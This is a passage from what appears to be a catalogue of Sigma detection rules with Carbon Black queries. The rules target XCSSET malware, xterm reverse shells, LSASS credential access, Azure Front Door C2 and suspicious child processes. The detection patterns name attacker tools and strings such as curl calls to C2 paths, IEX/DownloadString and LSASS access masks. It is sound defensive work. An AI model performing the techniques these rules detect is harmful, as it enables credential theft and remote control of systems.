    #     TargetFilename|contains: '\webapps\ROOT'
    # selection_tomcat_ext:
    #     TargetFilename|contains:
    #         - '.jsp' # .jspx, .jspf
    #         - '.jsv'
    #         - '.jsw'
    filter_main_temp:  # FP when unpacking some executables in $TEMP
        TargetFilename|contains:
            - '\AppData\Local\Temp\'
            - '\Windows\Temp\'
    filter_main_system:
        Image: 'System' # FP when backup/restore from drivers
    filter_main_legitimate:
        TargetFilename|contains: '\xampp'
    condition: (all of selection_wwwroot_* or all of selection_htdocs_*) and not 1 of filter_main_*
falsepositives:
    - Legitimate administrator or developer creating legitimate executable files in a web application folder
level: medium

Convert to SIEM query

medium Strong Medium FP

Potential XCSSET Malware Infection

Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.

status test author Tim Rauch (rule), Elastic (idea) ATT&CK tactic-only id 47d65ac0-c06f-4ba2-a2e3-d263139d0f51

carbon_black query

((ParentImage:\/bash Image:\/curl (CommandLine:\/sys\/log.php* OR CommandLine:\/sys\/prepod.php* OR CommandLine:\/sys\/bin\/Pods*)) CommandLine:https\:\/\/*) OR ((ParentImage:\/bash Image:\/osacompile (CommandLine:\/Users\/* CommandLine:\/Library\/Group\ Containers\/*)) OR (ParentImage:\/bash Image:\/plutil (CommandLine:LSUIElement* CommandLine:\/Users\/* CommandLine:\/Library\/Group\ Containers\/*)) OR (Image:\/zip (CommandLine:\-r* CommandLine:\/Users\/* CommandLine:\/Library\/Group\ Containers\/*)))

view Sigma YAML

title: Potential XCSSET Malware Infection
id: 47d65ac0-c06f-4ba2-a2e3-d263139d0f51
status: test
description: Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.
references:
    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08
    - https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset
author: Tim Rauch (rule), Elastic (idea)
date: 2022-10-17
tags:
    - attack.command-and-control
logsource:
    category: process_creation
    product: macos
detection:
    selection_1_curl:
        ParentImage|endswith: '/bash'
        Image|endswith: '/curl'
        CommandLine|contains:
            - '/sys/log.php'
            - '/sys/prepod.php'
            - '/sys/bin/Pods'
    selection_1_https:
        CommandLine|contains: 'https://'
    selection_other_1:
        ParentImage|endswith: '/bash'
        Image|endswith: '/osacompile'
        CommandLine|contains|all:
            - '/Users/'
            - '/Library/Group Containers/'
    selection_other_2:
        ParentImage|endswith: '/bash'
        Image|endswith: '/plutil'
        CommandLine|contains|all:
            - 'LSUIElement'
            - '/Users/'
            - '/Library/Group Containers/'
    selection_other_3:
        Image|endswith: '/zip'
        CommandLine|contains|all:
            - '-r'
            - '/Users/'
            - '/Library/Group Containers/'
    condition: all of selection_1_* or 1 of selection_other_*
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Moderate High FP

Potential Xterm Reverse Shell

Detects usage of "xterm" as a potential reverse shell tunnel

status test author @d4ns4n_ ATT&CK technique id 4e25af4b-246d-44ea-8563-e42aacab006b

carbon_black query

Image:xterm* CommandLine:\-display* CommandLine:\:1

view Sigma YAML

title: Potential Xterm Reverse Shell
id: 4e25af4b-246d-44ea-8563-e42aacab006b
status: test
description: Detects usage of "xterm" as a potential reverse shell tunnel
references:
    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
    - https://www.revshells.com/
author: '@d4ns4n_'
date: 2023-04-24
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|contains: 'xterm'
        CommandLine|contains: '-display'
        CommandLine|endswith: ':1'
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Strong Medium FP

Potentially Over Permissive Permissions Granted Using Dsacls.EXE

Detects usage of Dsacls to grant over permissive permissions

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id 01c42d3c-242d-4655-85b2-34f1739632f7

carbon_black query

(Image:\\dsacls.exe OR OriginalFileName:DSACLS.EXE) CommandLine:\ \/G\ * (CommandLine:GR* OR CommandLine:GE* OR CommandLine:GW* OR CommandLine:GA* OR CommandLine:WP* OR CommandLine:WD*)

view Sigma YAML

title: Potentially Over Permissive Permissions Granted Using Dsacls.EXE
id: 01c42d3c-242d-4655-85b2-34f1739632f7
status: test
description: Detects usage of Dsacls to grant over permissive permissions
references:
    - https://ss64.com/nt/dsacls.html
    - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-20
modified: 2023-02-04
tags:
    - attack.stealth
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\dsacls.exe'
        - OriginalFileName: "DSACLS.EXE"
    selection_flag:
        CommandLine|contains: ' /G '
    selection_permissions:
        CommandLine|contains: # Add more permissions as you see fit in your environment
            - 'GR'
            - 'GE'
            - 'GW'
            - 'GA'
            - 'WP'
            - 'WD'
    condition: all of selection_*
falsepositives:
    - Legitimate administrators granting over permissive permissions to users
level: medium

Convert to SIEM query

medium Strong Medium FP

Potentially Suspicious AccessMask Requested From LSASS

Detects process handle on LSASS process with certain access mask

status test author Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update) ATT&CK sub-technique id 4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76

carbon_black query

((EventID:4656 ObjectName:\\lsass.exe (AccessMask:0x40* OR AccessMask:0x1400* OR AccessMask:0x100000* OR AccessMask:0x1410* OR AccessMask:0x1010* OR AccessMask:0x1438* OR AccessMask:0x143a* OR AccessMask:0x1418* OR AccessMask:0x1f0fff* OR AccessMask:0x1f1fff* OR AccessMask:0x1f2fff* OR AccessMask:0x1f3fff*)) OR (EventID:4663 ObjectName:\\lsass.exe (AccessList:4484* OR AccessList:4416*))) (-(((ProcessName:\\csrss.exe OR ProcessName:\\GamingServices.exe OR ProcessName:\\lsm.exe OR ProcessName:\\MicrosoftEdgeUpdate.exe OR ProcessName:\\minionhost.exe OR ProcessName:\\MRT.exe OR ProcessName:\\MsMpEng.exe OR ProcessName:\\perfmon.exe OR ProcessName:\\procexp.exe OR ProcessName:\\procexp64.exe OR ProcessName:\\svchost.exe OR ProcessName:\\taskmgr.exe OR ProcessName:\\thor.exe OR ProcessName:\\thor64.exe OR ProcessName:\\vmtoolsd.exe OR ProcessName:\\VsTskMgr.exe OR ProcessName:\\wininit.exe OR ProcessName:\\wmiprvse.exe OR ProcessName:RtkAudUService64) (ProcessName:\:\\Program\ Files\ \(x86\)\\* OR ProcessName:\:\\Program\ Files\\* OR ProcessName:\:\\ProgramData\\Microsoft\\Windows\ Defender\\Platform\\* OR ProcessName:\:\\Windows\\SysNative\\* OR ProcessName:\:\\Windows\\System32\\* OR ProcessName:\:\\Windows\\SysWow64\\* OR ProcessName:\:\\Windows\\Temp\\asgard2\-agent\\*)) OR ProcessName:\:\\Program\ Files* OR (ProcessName:\:\\Windows\\System32\\taskhostw.exe OR ProcessName:\:\\Windows\\System32\\msiexec.exe OR ProcessName:\:\\Windows\\CCM\\CcmExec.exe) OR (ProcessName:\:\\Windows\\Sysmon64.exe AccessList:%%4484*) OR (ProcessName:\:\\Windows\\Temp\\asgard2\-agent\-sc\\aurora\\* ProcessName:\\aurora\-agent\-64.exe AccessList:%%4484*) OR (ProcessName:\\x64\\SCENARIOENGINE.EXE AccessList:%%4484*) OR ((ProcessName:\:\\Users\\* ProcessName:\\AppData\\Local\\Temp\\is\-*) ProcessName:\\avira_system_speedup.tmp AccessList:%%4484*) OR (ProcessName:\:\\Windows\\Temp\\* ProcessName:\\avira_speedup_setup_update.tmp AccessList:%%4484*) OR (ProcessName:\:\\Windows\\System32\\snmp.exe AccessList:%%4484*) OR (ProcessName:\:\\Windows\\SystemTemp\\* ProcessName:\\GoogleUpdate.exe AccessList:%%4484*))) (-((ProcessName:\\procmon64.exe OR ProcessName:\\procmon.exe) AccessList:%%4484*))

view Sigma YAML

title: Potentially Suspicious AccessMask Requested From LSASS
id: 4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76
status: test
description: Detects process handle on LSASS process with certain access mask
references:
    - https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html
    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
author: Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)
date: 2019-11-01
modified: 2023-12-19
tags:
    - attack.credential-access
    - car.2019-04-004
    - attack.t1003.001
logsource:
    product: windows
    service: security
detection:
    selection_1:
        EventID: 4656 # A handle to an object was requested.
        ObjectName|endswith: '\lsass.exe'
        AccessMask|contains:
            - '0x40'
            - '0x1400'
            # - '0x1000'  # minimum access requirements to query basic info from service
            - '0x100000'
            - '0x1410'    # car.2019-04-004
            - '0x1010'    # car.2019-04-004
            - '0x1438'    # car.2019-04-004
            - '0x143a'    # car.2019-04-004
            - '0x1418'    # car.2019-04-004
            - '0x1f0fff'
            - '0x1f1fff'
            - '0x1f2fff'
            - '0x1f3fff'
    selection_2:
        EventID: 4663 # An attempt was made to access an object
        ObjectName|endswith: '\lsass.exe'
        AccessList|contains:
            - '4484'
            - '4416'
    filter_main_specific:
        ProcessName|endswith:
            - '\csrss.exe'
            - '\GamingServices.exe'
            - '\lsm.exe'
            - '\MicrosoftEdgeUpdate.exe'
            - '\minionhost.exe'  # Cyberreason
            - '\MRT.exe'         # MS Malware Removal Tool
            - '\MsMpEng.exe'     # Defender
            - '\perfmon.exe'
            - '\procexp.exe'
            - '\procexp64.exe'
            - '\svchost.exe'
            - '\taskmgr.exe'
            - '\thor.exe'        # THOR
            - '\thor64.exe'      # THOR
            - '\vmtoolsd.exe'
            - '\VsTskMgr.exe'    # McAfee Enterprise
            - '\wininit.exe'
            - '\wmiprvse.exe'
            - 'RtkAudUService64' # https://medium.com/falconforce/the-curious-case-of-realtek-and-lsass-33fc0c8482ff
        ProcessName|contains:
            - ':\Program Files (x86)\'
            - ':\Program Files\'
            - ':\ProgramData\Microsoft\Windows Defender\Platform\'
            - ':\Windows\SysNative\'
            - ':\Windows\System32\'
            - ':\Windows\SysWow64\'
            - ':\Windows\Temp\asgard2-agent\'
    filter_main_generic:
        ProcessName|contains: ':\Program Files'  # too many false positives with legitimate AV and EDR solutions
    filter_main_exact:
        ProcessName|endswith:
            - ':\Windows\System32\taskhostw.exe'
            - ':\Windows\System32\msiexec.exe'
            - ':\Windows\CCM\CcmExec.exe'
    filter_main_sysmon:
        ProcessName|endswith: ':\Windows\Sysmon64.exe'
        AccessList|contains: '%%4484'
    filter_main_aurora:
        ProcessName|contains: ':\Windows\Temp\asgard2-agent-sc\aurora\'
        ProcessName|endswith: '\aurora-agent-64.exe'
        AccessList|contains: '%%4484'
    filter_main_scenarioengine:
        # Example: C:\a70de9569c3a5aa22184ef52a890177b\x64\SCENARIOENGINE.EXE
        ProcessName|endswith: '\x64\SCENARIOENGINE.EXE'
        AccessList|contains: '%%4484'
    filter_main_avira1:
        ProcessName|contains|all:
            - ':\Users\'
            - '\AppData\Local\Temp\is-'
        ProcessName|endswith: '\avira_system_speedup.tmp'
        AccessList|contains: '%%4484'
    filter_main_avira2:
        ProcessName|contains: ':\Windows\Temp\'
        ProcessName|endswith: '\avira_speedup_setup_update.tmp'
        AccessList|contains: '%%4484'
    filter_main_snmp:
        ProcessName|endswith: ':\Windows\System32\snmp.exe'
        AccessList|contains: '%%4484'
    filter_main_googleupdate:
        ProcessName|contains: ':\Windows\SystemTemp\'
        ProcessName|endswith: '\GoogleUpdate.exe'
        AccessList|contains: '%%4484'
    filter_optional_procmon:
        ProcessName|endswith:
            - '\procmon64.exe'
            - '\procmon.exe'
        AccessList|contains: '%%4484'
    condition: 1 of selection_* and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it
level: medium

Convert to SIEM query

medium Strong Medium FP

Potentially Suspicious Azure Front Door Connection

Detects connections with Azure Front Door (known legitimate service that can be leveraged for C2) that fall outside of known benign behavioral baseline (not using common apps or common azurefd.net endpoints)

status test author Isaac Dunham ATT&CK sub-technique id 8cb4d14e-776e-43c2-8fb9-91e7fcea32b4

carbon_black query

DestinationHostname:azurefd.net* (-((Image:brave.exe OR Image:chrome.exe OR Image:chromium.exe OR Image:firefox.exe OR Image:msedge.exe OR Image:msedgewebview2.exe OR Image:opera.exe OR Image:vivaldi.exe) OR Image:searchapp.exe OR (DestinationHostname:afdxtest.z01.azurefd.net* OR DestinationHostname:fp\-afd.azurefd.net* OR DestinationHostname:fp\-afdx\-bpdee4gtg6frejfd.z01.azurefd.net* OR DestinationHostname:roxy.azurefd.net* OR DestinationHostname:powershellinfraartifacts\-gkhedzdeaghdezhr.z01.azurefd.net* OR DestinationHostname:storage\-explorer\-publishing\-feapcgfgbzc2cjek.b01.azurefd.net* OR DestinationHostname:graph.azurefd.net*)))

view Sigma YAML

title: Potentially Suspicious Azure Front Door Connection
id: 8cb4d14e-776e-43c2-8fb9-91e7fcea32b4
status: test
description: |
    Detects connections with Azure Front Door (known legitimate service that can be leveraged for C2)
    that fall outside of known benign behavioral baseline (not using common apps or common azurefd.net endpoints)
references:
    - https://lots-project.com/site/2a2e617a75726566642e6e6574
    - https://medium.com/r3d-buck3t/red-teaming-in-cloud-leverage-azure-frontdoor-cdn-for-c2-redirectors-79dd9ca98178
    - https://www.fortalicesolutions.com/posts/hiding-behind-the-front-door-with-azure-domain-fronting
author: Isaac Dunham
date: 2024-11-07
tags:
    - attack.command-and-control
    - attack.t1102.002
    - attack.t1090.004
    - detection.threat-hunting
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        DestinationHostname|contains: 'azurefd.net'
    filter_main_web_browsers:
        Image|endswith:
            - 'brave.exe'
            - 'chrome.exe'
            - 'chromium.exe'
            - 'firefox.exe'
            - 'msedge.exe'
            - 'msedgewebview2.exe'
            - 'opera.exe'
            - 'vivaldi.exe'
    filter_main_common_talkers:
        Image|endswith: 'searchapp.exe' # Windows search service uses signifcant amount of Azure FD
    filter_main_known_benign_domains:
        DestinationHostname|contains:
            - 'afdxtest.z01.azurefd.net' # used by Cortana; Cisco Umbrella top 1m
            - 'fp-afd.azurefd.net' # used by Cortana; Cisco Umbrella top 1m
            - 'fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net' # used by Cortana; Cisco Umbrella top 1m
            - 'roxy.azurefd.net' # used by Cortana; Cisco Umbrella top 1m
            - 'powershellinfraartifacts-gkhedzdeaghdezhr.z01.azurefd.net' # Used by VS Code; Cisco Umbrella top 1m
            - 'storage-explorer-publishing-feapcgfgbzc2cjek.b01.azurefd.net' # Used by Azure Storage Explorer; Cisco Umbrella top 1m
            - 'graph.azurefd.net' # MS Graph; Cisco Umbrella top 1m
    condition: selection and not 1 of filter_main_*
falsepositives:
    - Results are not inherently suspicious, but should be investigated during threat hunting for potential cloud C2.
    - Organization-specific Azure Front Door endpoints
level: medium

Convert to SIEM query

medium Strong Medium FP

Potentially Suspicious CMD Shell Output Redirect

Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location. This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id 8e0bb260-d4b2-4fff-bb8d-3f82118e6892

carbon_black query

(Image:\\cmd.exe OR OriginalFileName:Cmd.Exe) ((CommandLine:>*%APPDATA%\\* OR CommandLine:>*%TEMP%\\* OR CommandLine:>*%TMP%\\* OR CommandLine:>*%USERPROFILE%\\* OR CommandLine:>*C\:\\ProgramData\\* OR CommandLine:>*C\:\\Temp\\* OR CommandLine:>*C\:\\Users\\Public\\* OR CommandLine:>*C\:\\Windows\\Temp\\*) OR ((CommandLine:\ >* OR CommandLine:\">* OR CommandLine:'>*) (CommandLine:C\:\\Users\\* CommandLine:\\AppData\\Local\\*)))

view Sigma YAML

title: Potentially Suspicious CMD Shell Output Redirect
id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892
related:
    - id: aa2efee7-34dd-446e-8a37-40790a66efd7
      type: derived
    - id: 4f4eaa9f-5ad4-410c-a4be-bc6132b0175a
      type: similar
status: test
description: |
    Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location.
    This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
references:
    - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-12
modified: 2024-03-19
tags:
    - attack.stealth
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\cmd.exe'
        - OriginalFileName: 'Cmd.Exe'
    selection_cli_1:
        CommandLine|contains:
            # Note: Add more suspicious locations as you find them
            # Note: The space from the start is missing to cover append operations ">>"
            # Note: We use the "?" to account for both a single and a double quote
            # Note: If you want to account for more spaces which is still a valid bypass option. Use a regex with "\s"
            - '>?%APPDATA%\'
            - '>?%TEMP%\'
            - '>?%TMP%\'
            - '>?%USERPROFILE%\'
            - '>?C:\ProgramData\'
            - '>?C:\Temp\'
            - '>?C:\Users\Public\'
            - '>?C:\Windows\Temp\'
    selection_cli_2:
        CommandLine|contains:
            - ' >'
            - '">'
            - "'>"
        CommandLine|contains|all:
            - 'C:\Users\'
            - '\AppData\Local\'
    condition: selection_img and 1 of selection_cli_*
falsepositives:
    - Legitimate admin or third party scripts used for diagnostic collection might generate some false positives
level: medium

Convert to SIEM query

medium Strong Medium FP

Potentially Suspicious Cabinet File Expansion

Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks

status test author Bhabesh Raj, X__Junior (Nextron Systems) ATT&CK technique id 9f107a84-532c-41af-b005-8d12a607639f

carbon_black query

(Image:\\expand.exe (CommandLine:\-F\:* OR CommandLine:\/F\:* OR CommandLine:–F\:* OR CommandLine:—F\:* OR CommandLine:―F\:*)) ((CommandLine:\:\\Perflogs\\* OR CommandLine:\:\\ProgramData* OR CommandLine:\:\\Users\\Public\\* OR CommandLine:\:\\Windows\\Temp\\* OR CommandLine:\\Admin$\\* OR CommandLine:\\AppData\\Local\\Temp\\* OR CommandLine:\\AppData\\Roaming\\* OR CommandLine:\\C$\\* OR CommandLine:\\Temporary\ Internet*) OR ((CommandLine:\:\\Users\\* CommandLine:\\Favorites\\*) OR (CommandLine:\:\\Users\\* CommandLine:\\Favourites\\*) OR (CommandLine:\:\\Users\\* CommandLine:\\Contacts\\*))) (-(ParentImage:C\:\\Program\ Files\ \(x86\)\\Dell\\UpdateService\\ServiceShell.exe CommandLine:C\:\\ProgramData\\Dell\\UpdateService\\Temp\\*))

view Sigma YAML

title: Potentially Suspicious Cabinet File Expansion
id: 9f107a84-532c-41af-b005-8d12a607639f
status: test
description: Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks
references:
    - https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll
    - https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/
author: Bhabesh Raj, X__Junior (Nextron Systems)
date: 2021-07-30
modified: 2024-11-13
tags:
    - attack.stealth
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection_cmd:
        Image|endswith: '\expand.exe'
        CommandLine|contains|windash: '-F:'
    selection_folders_1:
        CommandLine|contains:
            - ':\Perflogs\'
            - ':\ProgramData'
            - ':\Users\Public\'
            - ':\Windows\Temp\'
            - '\Admin$\'
            - '\AppData\Local\Temp\'
            - '\AppData\Roaming\'
            - '\C$\'
            - '\Temporary Internet'
    selection_folders_2:
        - CommandLine|contains|all:
              - ':\Users\'
              - '\Favorites\'
        - CommandLine|contains|all:
              - ':\Users\'
              - '\Favourites\'
        - CommandLine|contains|all:
              - ':\Users\'
              - '\Contacts\'
    filter_optional_dell:
        # Launched by Dell ServiceShell.exe
        ParentImage: 'C:\Program Files (x86)\Dell\UpdateService\ServiceShell.exe'
        CommandLine|contains: 'C:\ProgramData\Dell\UpdateService\Temp\'
    condition: selection_cmd and 1 of selection_folders_* and not 1 of filter_optional_*
falsepositives:
    - System administrator Usage
level: medium

Convert to SIEM query

medium Moderate High FP

Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript

Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id e2812b49-bae0-4b21-b366-7c142eafcde2

carbon_black query

ScriptBlockText:Win32_NTEventlogFile* (ScriptBlockText:.BackupEventlog\(* OR ScriptBlockText:.ChangeSecurityPermissions\(* OR ScriptBlockText:.ChangeSecurityPermissionsEx\(* OR ScriptBlockText:.ClearEventLog\(* OR ScriptBlockText:.Delete\(* OR ScriptBlockText:.DeleteEx\(* OR ScriptBlockText:.Rename\(* OR ScriptBlockText:.TakeOwnerShip\(* OR ScriptBlockText:.TakeOwnerShipEx\(*)

view Sigma YAML

title: Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript
id: e2812b49-bae0-4b21-b366-7c142eafcde2
status: test
description: Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script
references:
    - https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85)
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-07-13
tags:
    - attack.defense-impairment
logsource:
    category: ps_script
    product: windows
    definition: bade5735-5ab0-4aa7-a642-a11be0e40872
detection:
    selection_class:
        ScriptBlockText|contains: 'Win32_NTEventlogFile'
    selection_function:
        ScriptBlockText|contains:
            - '.BackupEventlog('
            - '.ChangeSecurityPermissions('
            - '.ChangeSecurityPermissionsEx('
            - '.ClearEventLog('
            - '.Delete('
            - '.DeleteEx('
            - '.Rename('
            - '.TakeOwnerShip('
            - '.TakeOwnerShipEx('
    condition: all of selection_*
falsepositives:
    - Legitimate administration and backup scripts
level: medium

Convert to SIEM query

medium Moderate Medium FP

Potentially Suspicious Child Process Of ClickOnce Application

Detects potentially suspicious child processes of a ClickOnce deployment application

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK tactic-only id 67bc0e75-c0a9-4cfc-8754-84a505b63c04

carbon_black query

ParentImage:\\AppData\\Local\\Apps\\2.0\\* (Image:\\calc.exe OR Image:\\cmd.exe OR Image:\\cscript.exe OR Image:\\explorer.exe OR Image:\\mshta.exe OR Image:\\net.exe OR Image:\\net1.exe OR Image:\\nltest.exe OR Image:\\notepad.exe OR Image:\\powershell.exe OR Image:\\pwsh.exe OR Image:\\reg.exe OR Image:\\regsvr32.exe OR Image:\\rundll32.exe OR Image:\\schtasks.exe OR Image:\\werfault.exe OR Image:\\wscript.exe)

view Sigma YAML

title: Potentially Suspicious Child Process Of ClickOnce Application
id: 67bc0e75-c0a9-4cfc-8754-84a505b63c04
status: test
description: Detects potentially suspicious child processes of a ClickOnce deployment application
references:
    - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-06-12
tags:
    - attack.execution
    - attack.stealth
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|contains: '\AppData\Local\Apps\2.0\'
        Image|endswith:
            # Add more suspicious processes
            - '\calc.exe'
            - '\cmd.exe'
            - '\cscript.exe'
            - '\explorer.exe'
            - '\mshta.exe'
            - '\net.exe'
            - '\net1.exe'
            - '\nltest.exe'
            - '\notepad.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\reg.exe'
            - '\regsvr32.exe'
            - '\rundll32.exe'
            - '\schtasks.exe'
            - '\werfault.exe'
            - '\wscript.exe'
    condition: selection
falsepositives:
    - Unknown
level: medium

Convert to SIEM query

medium Strong Medium FP

Potentially Suspicious Child Process Of DiskShadow.EXE

Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id 9f546b25-5f12-4c8d-8532-5893dcb1e4b8

carbon_black query

ParentImage:\\diskshadow.exe (Image:\\certutil.exe OR Image:\\cscript.exe OR Image:\\mshta.exe OR Image:\\powershell.exe OR Image:\\pwsh.exe OR Image:\\regsvr32.exe OR Image:\\rundll32.exe OR Image:\\wscript.exe)

view Sigma YAML

title: Potentially Suspicious Child Process Of DiskShadow.EXE
id: 9f546b25-5f12-4c8d-8532-5893dcb1e4b8
related:
    - id: fa1a7e52-3d02-435b-81b8-00da14dd66c1 # Diskshadow Script Mode - Execution From Potential Suspicious Location
      type: similar
    - id: 1dde5376-a648-492e-9e54-4241dd9b0c7f # Diskshadow Script Mode - Uncommon Script Extension Execution
      type: similar
    - id: 56b1dde8-b274-435f-a73a-fb75eb81262a # Diskshadow Child Process Spawned
      type: similar
    - id: 0c2f8629-7129-4a8a-9897-7e0768f13ff2 # Diskshadow Script Mode Execution
      type: similar
status: test
description: Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.
references:
    - https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
    - https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration
    - https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow
    - https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf
    - https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware
    - https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-09-15
tags:
    - attack.stealth
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\diskshadow.exe'
        Image|endswith:
            # Note: add or remove additional binaries according to your org needs
            - '\certutil.exe'
            - '\cscript.exe'
            - '\mshta.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\regsvr32.exe'
            - '\rundll32.exe'
            - '\wscript.exe'
    condition: selection
falsepositives:
    - False postitve can occur in cases where admin scripts levreage the "exec" flag to execute applications
level: medium

Convert to SIEM query

medium Strong Medium FP

Potentially Suspicious Child Process Of VsCode

Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id 5a3164f2-b373-4152-93cf-090b13c12d27

carbon_black query

ParentImage:\\code.exe ((Image:\\calc.exe OR Image:\\regsvr32.exe OR Image:\\rundll32.exe OR Image:\\cscript.exe OR Image:\\wscript.exe) OR ((Image:\\powershell.exe OR Image:\\pwsh.exe OR Image:\\cmd.exe) (CommandLine:Invoke\-Expressions* OR CommandLine:IEX* OR CommandLine:Invoke\-Command* OR CommandLine:ICM* OR CommandLine:DownloadString* OR CommandLine:rundll32* OR CommandLine:regsvr32* OR CommandLine:wscript* OR CommandLine:cscript*)) OR (Image:\:\\Users\\Public\\* OR Image:\:\\Windows\\Temp\\* OR Image:\:\\Temp\\*))

view Sigma YAML

title: Potentially Suspicious Child Process Of VsCode
id: 5a3164f2-b373-4152-93cf-090b13c12d27
status: test
description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles.
references:
    - https://twitter.com/nas_bench/status/1618021838407495681
    - https://twitter.com/nas_bench/status/1618021415852335105
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-01-26
modified: 2023-10-25
tags:
    - attack.execution
    - attack.stealth
    - attack.t1218
    - attack.t1202
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\code.exe'
    selection_children_images:
        Image|endswith:
            - '\calc.exe'
            - '\regsvr32.exe'
            - '\rundll32.exe'
            - '\cscript.exe'
            - '\wscript.exe'
    selection_children_cli:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\cmd.exe'
        CommandLine|contains:
            - 'Invoke-Expressions'
            - 'IEX'
            - 'Invoke-Command'
            - 'ICM'
            - 'DownloadString'
            - 'rundll32'
            - 'regsvr32'
            - 'wscript'
            - 'cscript'
    selection_children_paths:
        Image|contains:
            # Add more suspicious locations
            - ':\Users\Public\'
            - ':\Windows\Temp\'
            - ':\Temp\'
    condition: selection_parent and 1 of selection_children_*
falsepositives:
    - In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly
level: medium

Convert to SIEM query

medium Moderate High FP

Potentially Suspicious Child Process Of WinRAR.EXE

Detects potentially suspicious child processes of WinRAR.exe.

status test author Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id 146aace8-9bd6-42ba-be7a-0070d8027b76

carbon_black query

